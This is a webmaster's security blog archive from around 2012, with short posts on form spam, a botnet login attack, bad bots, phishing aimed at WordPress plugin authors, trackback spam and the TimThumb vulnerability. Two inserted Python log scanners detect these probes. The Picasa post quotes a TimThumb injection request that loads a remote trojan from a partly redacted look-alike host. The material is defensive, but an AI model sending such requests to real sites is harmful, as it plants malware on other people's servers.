Category Archives: Internet Security

Weird Spam by E-Mail

Nonsense Spam

Just when I thought I’d seen it all, I get some really weird spam e-mail from a webform response. Every possible field filled in with a website URL or nonsense text. And there are lots of fields. Stranger still, the mail form responds to a promotion that ended in October 2011…

Email: wxgokb@ hswhrm.com

First Name: zmcpff
Last Name: zmcpff
Company: zmcpff

Bus Tel: 5283678809
Cell: 2194836070

Post Address L2: http: //thumekeyzrdi.com/
Suburb: http: //thumekeyzrdi.com/
City: New York
Code: 9804

Street Address: http: //thumekeyzrdi.com/
Street Address L2: http: //thumekeyzrdi.com/
Suburb: http: //thumekeyzrdi.com/
City: New York
Code: 9804

Ownership Type:  Self Employed (Sole Trader)
Business Sector:  Clothing/Textile

Employees: 1-3

Description of Business: Gog0rh <a href=”http: //geqsrfadufdz.com/”>geqsrfadufdz</a>http: //chxxwqcqcloy.com/]chxxwqcqcloy, http: //zadxoljxogol.com/zadxoljxogol, http: //xynmrvbkogwj.com/

Read the rest of this entry

Botnet Attacks WordPress Website

Apparent Botnet Attacked My WordPress Website

What appeared to be a botnet attacked one of my sites (tech.graphicline.co.za) this morning in a brute-force wp-login attempt from multiple IP addresses. This was the most coordinated attack against any of my sites I’ve experienced. Usually the hacker bots I see use up to 6 IPs in these attacks – 146 IPs is serious stuff…

146 IPs Used in Simultaneous Attack

The IPs listed below are the guilty parties to this brute-force login attack on the site. The main attack started at 05h09 GMT this morning (November 25, 2012) and continued until 05h15 GMT. A second, less intense attack followed, starting at 05h16 GMT and tailing off until it ended at 05h43 GMT.

Read the rest of this entry

FreeWebMonitoring SiteChecker/0.1

Hacker Bot FreeWebMonitoring SiteChecker/0.1 Pays a Visit

Bad bot “FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)” paid a visit to one of my websites yesterday from IP address 184.107.201.242, which belongs to the Canadian service provider Canada Montreal Thst Golf Inc.

The full range of IPs owned by Canada Montreal Thst Golf Inc. is 184.107.0.0 - 184.107.255.255

This bot is not the bot used by freewebmonitoring.com. Their bot is “FreeWebMonitoring SiteChecker/0.2 (+http://www.freewebmonitoring.com/bot.html)”

Read the rest of this entry

Go Away Baidu and Yandex

Baidu and Yandex Bots Forbidden Access

That’s it folks, I have denied access to the Baidu and Yandex web spiders. I don’t want them crawling my sites, I don’t want them crawling my clients’ sites (unless the client wants them to, of course). Neither of these bots follows advanced robots.txt disallow rules, and they crawl areas of the sites I don’t want indexed… In particular I don’t want them continually searching my sites for non-existent RSS feeds and /trackback URLs, thus generating excessive page not found errors.

I am becoming stricter with web bots that do not comply with the more advanced robots.txt rules, e.g. “disallow /feed” and wildcards. Google obeys these rules, Bing obeys these rules, and any other worthwhile search engine should also obey these rules.

Read the rest of this entry

What is Verify Compliance Page

verify-Compliance_Page | notified-Compliance_Page

I noticed a few 404 page not found errors in activity logs for several sites today using these strings: verify-Compliance_Page?aHR0cDovL3d3dy5ncmFwaGljbGluZS5jby56YS8= and notified-Compliance_Page with the same rubbish string on the end. When I find odd GET requests I invariably try to find out more about what the ‘visitor’ is trying to do. Are they trying to hack, access forbidden areas, upload malware or post spam…

As far as verify-Compliance_Page and notified-Compliance_Page are concerned, the amount of substantiated information is notable only in its scarcity. So for any webmaster who is also looking for information about these odd GET requests, this is what I was able to establish.
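The trailing string on those requests is plain base64: the one quoted above decodes to the site’s own URL, http://www.graphicline.co.za/. As an added example (not code from the original post), here is a small Python scanner that pulls these two request paths out of an access log and decodes the query string safely, returning None when it is not valid base64. The log lines are constructed for the demo; the request paths and the base64 string are the ones quoted above.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (common log format). The two compliance
# requests reuse the exact path and base64 string quoted in the post; the
# IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2012:08:15:02 +0000] "GET /verify-Compliance_Page?aHR0cDovL3d3dy5ncmFwaGljbGluZS5jby56YS8= HTTP/1.1" 404 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2012:08:15:03 +0000] "GET /notified-Compliance_Page?aHR0cDovL3d3dy5ncmFwaGljbGluZS5jby56YS8= HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2012:08:16:00 +0000] "GET /about/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2012:08:16:01 +0000] "GET /verify-Compliance_Page?not*base64 HTTP/1.1" 404 512 "-" "Mozilla/5.0"
"""

# Minimal common-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The two odd paths the post describes.
COMPLIANCE_PATHS = ("/verify-Compliance_Page", "/notified-Compliance_Page")


def decode_payload(raw: str):
    """Strictly base64-decode a query string; return None if it is not valid base64 text.

    validate=True rejects characters outside the base64 alphabet instead of
    silently discarding them, so garbage does not decode to garbage.
    """
    try:
        data = base64.b64decode(unquote(raw), validate=True)
        return data.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def find_compliance_probes(log_text: str):
    """Return one record per request to the compliance paths, with the decoded payload."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path not in COMPLIANCE_PATHS:
            continue
        hits.append({
            "ip": m.group("ip"),
            "path": parts.path,
            "status": int(m.group("status")),
            "payload": parts.query,
            "decoded": decode_payload(parts.query),
        })
    return hits


if __name__ == "__main__":
    for hit in find_compliance_probes(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["status"], hit["decoded"])
```

Run it on a real access log by replacing SAMPLE_LOG with the file contents; the decoded column shows immediately whether the requester is just echoing your own site URL back at you, as in this case, or carrying something else.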

Read the rest of this entry

WordPress Plugin Phishing Scam

Phishing Scam Targets WordPress Plugin Developers

What may be the first phishing scam specifically targeting WordPress plugin authors has been discovered. The scam comes in the form of an e-mail claiming the developer’s plugin has been removed from the WordPress Repository, and tells the plugin author to use the link in the mail to log in and change their password.

The e-mail uses the Subject line “[WordPress.org Plugins] Urgent: Your Plugin Has Been Removed” and has this message content:

Dear WordPress Plugin Developer,

Unfortunately, a plugin you are hosting has been temporarily removed from the WordPress repository. We are going to manually review your plugin because it has been reported for violating our Terms of Service. If your plugin does not get approved then it will be permanently removed from the WordPress repository.

You can check if your plugin has been approved or rejected at…

This is not an official WordPress email!

Read the rest of this entry

Microsoft Security Essentials

Microsoft Security Essentials Under Microscope

A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?

Over the next few months we will see.

Annoyed with Commercial AV Software

I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too many system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps is able to detect every virus or malware… An example is Trojan Generic 24, which seems to be detected only by AVG (but AVG doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.

Read the rest of this entry

Picasa Spoofed for Malware Injection

Hackers Using Picasa Spoof for Web Malware

Strange-looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to inject malware or spam. Examining the details of the referer reveals something like this example: /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (the stars replace the actual characters in the string for your safety; the link leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!

Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long and similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious; the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.

Read the rest of this entry

Trackback Spam

A Rising Trend – Trackback or Pingback Spam

What is Trackback Spam? Trackback spam is a way for spammers to garner backlinks from your posts to their website. I categorise trackback spam into three groups: first, false trackback spam; then the obscured related-article link; and finally mass trackback spam.

False Trackback Spam

[Diagram: trackback spam. Image from Rice University – Computer Security Lab]

This is the most insidious and unethical of the three groups. False trackback spam is when a spammer creates a list of related-article links and publishes the post, so that a ping is sent to your blog, resulting in a trackback (or pingback) that the spammer hopes will get published, either automatically if moderation is not in place, or by a blogger thinking, “how nice of this person to link to my post”.

After the ping has been sent, the spammer then REMOVES the links to your article… This is a trackback spam method I see more often lately.

Obscured Links

Read the rest of this entry

TimThumb Exploit

TimThumb PHP WordPress Vulnerability

An image re-size script, timthumb.php, released by Google and used by many WordPress (self-hosted) themes and plugins had a vulnerability allowing hackers to upload malicious script files to a WordPress website.

Hackers use automated bots to trawl sites looking for timthumb.php files in certain folders, e.g. /wp-content/themes/ and /wp-content/plugins/. Once the bot has found timthumb.php, the hacker will try to attack the site.

The vulnerability was discovered in August 2011, and the file was immediately patched to prevent these attacks. Judging by the large number of bots still looking for these files, there must be many unpatched versions still in use on WordPress blogs and sites.

Read the rest of this entry
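The two excerpts above (the Picasa look-alike referer and the bots trawling for timthumb.php) describe the same pattern seen from the log side: a request for a thumbnail script, with or without an src parameter that points at a host outside your own image sources. As an added example, not code from this blog or from the TimThumb project, here is a Python log scanner that flags those requests. The allow-list of image hosts, the log lines and the look-alike domain picasa.com.lookalike.invalid are constructed for the demo (the .invalid name stands in for the redacted one in the post); the brand list and the classification rules are assumptions you would tune to your own sites.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Hosts your own thumbnailer is allowed to fetch images from (constructed for this example).
ALLOWED_IMAGE_HOSTS = {"www.example.org", "img.example.org"}
# Well-known domains that get glued to the front of a longer, unrelated hostname.
LOOKALIKE_BRANDS = ("picasa.com", "google.com", "blogger.com")
# Script names the post says the bots look for.
THUMB_SCRIPTS = ("timthumb.php", "thumb.php")

# Combined log format: client IP, timestamp, method, target, status, size, referer.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

# Constructed sample log lines: a look-alike src, a bare probe for timthumb.php, and a legitimate call.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Nov/2012:05:09:00 +0000] "GET /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.lookalike.invalid/2.php HTTP/1.1" 200 811 "http://picasa.com.lookalike.invalid/2.php" "-"
203.0.113.7 - - [25/Nov/2012:05:09:01 +0000] "GET /wp-content/plugins/gallery/timthumb.php HTTP/1.1" 404 211 "-" "-"
198.51.100.9 - - [25/Nov/2012:05:10:00 +0000] "GET /wp-content/themes/biznizz/thumb.php?src=http://img.example.org/photo.jpg&w=100 HTTP/1.1" 200 4096 "http://www.example.org/" "-"
"""


def classify_src_host(host: str):
    """Return a reason string if the src host is suspect, or None if it is allowed."""
    host = host.lower()
    if host in ALLOWED_IMAGE_HOSTS:
        return None
    for brand in LOOKALIKE_BRANDS:
        # A genuine brand host is the brand itself or ends with ".brand".
        # If the brand's labels appear anywhere else, the real registered domain
        # is the tail of the name, e.g. picasa.com.evil.invalid -> look-alike.
        if host != brand and not host.endswith("." + brand) and ("." + brand + ".") in ("." + host + "."):
            return f"lookalike of {brand}"
    return "external host not in allow-list"


def is_thumb_script(path: str) -> bool:
    """True when the last path segment is one of the thumbnail script names."""
    return path.rsplit("/", 1)[-1].lower() in THUMB_SCRIPTS


def scan_timthumb_requests(log_text: str):
    """Return a finding for every suspicious request to a thumbnail script."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not is_thumb_script(parts.path):
            continue
        status = int(m.group("status"))
        src = parse_qs(parts.query).get("src", [None])[0]
        finding = {"ip": m.group("ip"), "path": parts.path, "status": status, "src": src}
        if src is None:
            # A hit on the bare script name is the trawling the post describes;
            # a 404 means the bot is still hunting, a 200 means it found one.
            finding["reason"] = "probe for thumbnail script (no src)" if status == 404 else "thumbnail script hit without src"
        else:
            finding["reason"] = classify_src_host(urlsplit(src).hostname or "")
        if finding["reason"] is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_timthumb_requests(SAMPLE_LOG):
        print(f["ip"], f["status"], f["path"], f["src"], "->", f["reason"])
```

The allow-list is the important part: a fixed thumbnailer still fetches from the hosts you configure, so anything else in src is either a misconfiguration or a probe, and the IPs it comes from are the ones worth checking and blocking as the Picasa excerpt suggests.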